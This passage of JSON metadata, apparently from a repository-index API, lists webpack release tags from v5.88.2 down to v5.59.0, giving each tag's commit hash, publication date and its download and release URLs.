/webpack/tar.gz/v5.88.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.88.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.88.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.2/manifests"},{"name":"v5.88.1","sha":"6be4065ade1e252c1d8dcba4af0f43e32af1bdc1","kind":"tag","published_at":"2023-06-28T16:34:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.88.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.88.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.88.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.1/manifests"},{"name":"v5.88.0","sha":"1e18b1d1c74e26a84e9adee519c045e2d8ed40a4","kind":"tag","published_at":"2023-06-21T18:09:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.88.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.88.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.88.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.0/manifests"},{"name":"v5.87.0","sha":"8e0e0eb47d47fe33e4c9ef9bc455d9584f7ea92c","kind":"tag","published_at":"2023-06-14T18:24:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.87.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.87.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.87.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.87.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.87.0/manifests"},{"name":"v5.86.0","sha":"2dc8755dc40e24e3ba5760e96738b74990116711","kind":"tag","published_at":"2023-06-07T15:13:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.86.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.86.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.86.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.86.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.86.0/manifests"},{"name":"v5.85.1","sha":"f0f0dd548871566c77c69cdf3d00eaf0faf9a5cd","kind":"tag","published_at":"2023-06-05T14:30:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.85.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.85.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.85.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.85.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.85.1/manifests"},{"name":"v5.85.0","sha":"c80b069dca8eedebfa8ede9ce740891362fdb8bf","kind":"tag","published_at":"2023-05-31T19:20:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.85.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.85.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.85.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.85.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.85.0/manifests"},{"name":"v5.84.1","sha":"71d9a21c32974b5166f9ce2f5549849d0c7ad310","kind":"tag","published_at":"2023-05-25T18:35:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.84.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.84.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.84.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.84.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.84.1/manifests"},{"name":"v5.84.0","sha":"4d4caf13add84f996790e5bbdf79b66a548f8273","kind":"tag","published_at":"2023-05-24T17:00:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.84.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.84.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.84.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.84.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.84.0/manifests"},{"name":"v5.83.1","sha":"81c8fbde2e0e4b8d2e30a5109dedc082ef8c09dc","kind":"tag","published_at":"2023-05-17T20:22:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.83.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.83.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.83.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.83.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.83.1/manifests"},{"name":"v5.83.0","sha":"ccb3b860520c9472eff3d411a48105f882cf482a","kind":"tag","published_at":"2023-05-17T15:29:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.83.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.83.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.83.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.83.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.83.0/manifests"},{"name":"v5.82.1","sha":"a8fd8b7598e8a599871765e0167cacf8318944a9","kind":"tag","published_at":"2023-05-10T15:36:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.82.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.82.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.82.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.82.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.82.1/manifests"},{"name":"v5.82.0","sha":"1018ca80b31ea72436510398cca5be335b6ac81c","kind":"tag","published_at":"2023-05-03T17:03:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.82.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.82.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.82.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.82.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.82.0/manifests"},{"name":"v5.81.0","sha":"5c016a8ec1bbfd73a7fc20d4b474938e61ee3a57","kind":"tag","published_at":"2023-04-26T14:41:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.81.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.81.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.81.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.81.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.81.0/manifests"},{"name":"v5.80.0","sha":"9ac1728ee359efbbd1eb317f4a12c0f8136a690e","kind":"tag","published_at":"2023-04-19T16:56:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.80.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.80.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.80.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.80.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.80.0/manifests"},{"name":"v5.79.0","sha":"ecdcc1a1d02a3097acb9ebc0896365ae1f4d25e2","kind":"tag","published_at":"2023-04-12T15:12:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.79.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.79.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.79.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.79.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.79.0/manifests"},{"name":"v5.78.0","sha":"e51f8347026588c90f9bd91681597e97f24f40c9","kind":"tag","published_at":"2023-04-05T18:09:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.78.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.78.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.78.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.78.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.78.0/manifests"},{"name":"v5.77.0","sha":"263f29189060529198b7ab4dbddfd2dca46bd96e","kind":"tag","published_at":"2023-03-29T14:19:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.77.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.77.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.77.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.77.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.77.0/manifests"},{"name":"v5.76.3","sha":"8ac9616280aebfb61ae7484f06ad1979d73e6a56","kind":"tag","published_at":"2023-03-22T14:59:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.76.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.76.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.76.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.3/manifests"},{"name":"v5.76.2","sha":"dbf7bf39ab96e1462603435c150d601bb69ebe4e","kind":"tag","published_at":"2023-03-15T15:00:55.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.76.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.76.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.76.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.2/manifests"},{"name":"v5.76.1","sha":"21be52b681c477f8ebc41c1b0e7a7a8ac4fa7008","kind":"commit","published_at":"2023-03-10T22:59:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.76.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.76.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.76.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.1/manifests"},{"name":"v5.76.0","sha":"97b1718720c33f1b17302a74c5284b01e02ec001","kind":"commit","published_at":"2023-03-08T17:17:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.76.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.76.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.76.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.0/manifests"},{"name":"v5.75.0","sha":"8241da7f1e75c5581ba535d127fa66aeb9eb2ac8","kind":"tag","published_at":"2022-11-09T15:27:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.75.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.75.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.75.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.75.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.75.0/manifests"},{"name":"v5.74.0","sha":"8f87b50dc7ac24eb5c91fd0d55a22e34e252863c","kind":"tag","published_at":"2022-07-25T08:00:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.74.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.74.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.74.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.74.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.74.0/manifests"},{"name":"v5.73.0","sha":"36051a5ca77b4fa33fac651e1af650c7b910a873","kind":"tag","published_at":"2022-06-02T11:24:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.73.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.73.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.73.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.73.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.73.0/manifests"},{"name":"v5.72.1","sha":"08ecfbbc035b12f2ed5c0b83b53011dfe57ae7c9","kind":"tag","published_at":"2022-05-10T10:41:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.72.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.72.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.72.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.72.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.72.1/manifests"},{"name":"v5.72.0","sha":"d3a0f8de03f26a83b4d5db3cfe177617a3801df3","kind":"tag","published_at":"2022-04-07T12:36:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.72.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.72.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.72.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.72.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.72.0/manifests"},{"name":"v5.71.0","sha":"c2079f7e7666a913d6fdad4b9102ffb0d3801cc8","kind":"tag","published_at":"2022-04-01T13:41:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.71.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.71.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.71.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.71.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.71.0/manifests"},{"name":"v5.70.0","sha":"5a26b7c4a923c42022ca97fe9cbf46907a20d6d8","kind":"tag","published_at":"2022-03-03T14:23:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.70.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.70.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.70.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.70.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.70.0/manifests"},{"name":"v5.69.1","sha":"dfdc8b133d3d49371251e29efeefb9d31b982c9e","kind":"tag","published_at":"2022-02-17T13:46:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.69.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.69.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.69.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.69.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.69.1/manifests"},{"name":"v5.69.0","sha":"9d21401151b32abcefad0ffdb3238da91e2089ef","kind":"tag","published_at":"2022-02-15T12:33:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.69.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.69.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.69.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.69.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.69.0/manifests"},{"name":"v5.68.0","sha":"f593d98453e7920bf65f24bf051cd67b5704b59d","kind":"tag","published_at":"2022-01-31T16:25:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.68.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.68.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.68.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.68.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.68.0/manifests"},{"name":"v5.67.0","sha":"4abe329dcdaea60371c03c0d85c3a3994d875138","kind":"tag","published_at":"2022-01-21T17:44:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.67.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.67.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.67.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.67.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.67.0/manifests"},{"name":"v5.66.0","sha":"0105bc1f005d78e3819a567ffb91432683569070","kind":"tag","published_at":"2022-01-12T08:23:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.66.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.66.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.66.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.66.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.66.0/manifests"},{"name":"v5.65.0","sha":"323d65e2b1f6d275bf1b4a93ef753f027de78193","kind":"tag","published_at":"2021-12-06T13:57:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.65.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.65.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.65.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.65.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.65.0/manifests"},{"name":"v5.64.4","sha":"d3cd4cb6e38338237fe722d4b7feae2244c425c5","kind":"tag","published_at":"2021-11-25T15:49:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.64.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.64.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.64.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.4/manifests"},{"name":"v5.64.3","sha":"c66e4ce32027fd31935ce9197c219e46308ebd3f","kind":"tag","published_at":"2021-11-24T08:27:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.64.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.64.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.64.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.3/manifests"},{"name":"v5.64.2","sha":"0065223c4ddac3bf872bc8d660ef1e9a63afa080","kind":"tag","published_at":"2021-11-20T13:43:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.64.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.64.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.64.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.2/manifests"},{"name":"v5.64.1","sha":"3d5503a5b535b89bbdde78535c1839cefd88e4fa","kind":"tag","published_at":"2021-11-15T17:16:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.64.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.64.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.64.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.1/manifests"},{"name":"v5.64.0","sha":"789e58514b5747f6474bc247e4e104ce22892a2c","kind":"tag","published_at":"2021-11-11T14:16:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.64.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.64.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.64.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.0/manifests"},{"name":"v5.63.0","sha":"f011c70aacbd4dd3c4e518b9b9d8ea945dce0a9a","kind":"tag","published_at":"2021-11-09T19:30:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.63.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.63.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.63.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.63.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.63.0/manifests"},{"name":"v5.62.2","sha":"3aed1fe0249f8730a35fab62e3cdc3b399b0b6e9","kind":"tag","published_at":"2021-11-09T11:12:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.62.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.62.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.62.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.2/manifests"},{"name":"v5.62.1","sha":"daba59b3d60e7895543b6563682c209e4ad6b8b8","kind":"tag","published_at":"2021-11-05T16:26:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.62.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.62.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.62.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.1/manifests"},{"name":"v5.62.0","sha":"04640dcc757c8b3e78c6cbf6e4dda7cbbde33fe2","kind":"tag","published_at":"2021-11-05T14:56:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.62.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.62.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.62.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.0/manifests"},{"name":"v5.61.0","sha":"0306510f7d1b9b13900f1dcf78a767c2ed390a61","kind":"tag","published_at":"2021-10-29T14:00:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.61.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.61.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.61.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.61.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.61.0/manifests"},{"name":"v5.60.0","sha":"f0298fe46fc22eebf42eb034a9435d7c19aeddd9","kind":"tag","published_at":"2021-10-25T16:20:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.60.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.60.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.60.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.60.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.60.0/manifests"},{"name":"v5.59.1","sha":"3dbbdcb28cce3860247f06a18e48f536ab266834","kind":"tag","published_at":"2021-10-20T21:39:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.59.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.59.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.59.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.59.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.59.1/manifests"},{"name":"v5.59.0","sha":"19ca23f062544263f48d2947da0ecfb29ae0bb36","kind":"tag","published_at":"2021-10-19T17:54:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.59.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.59.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack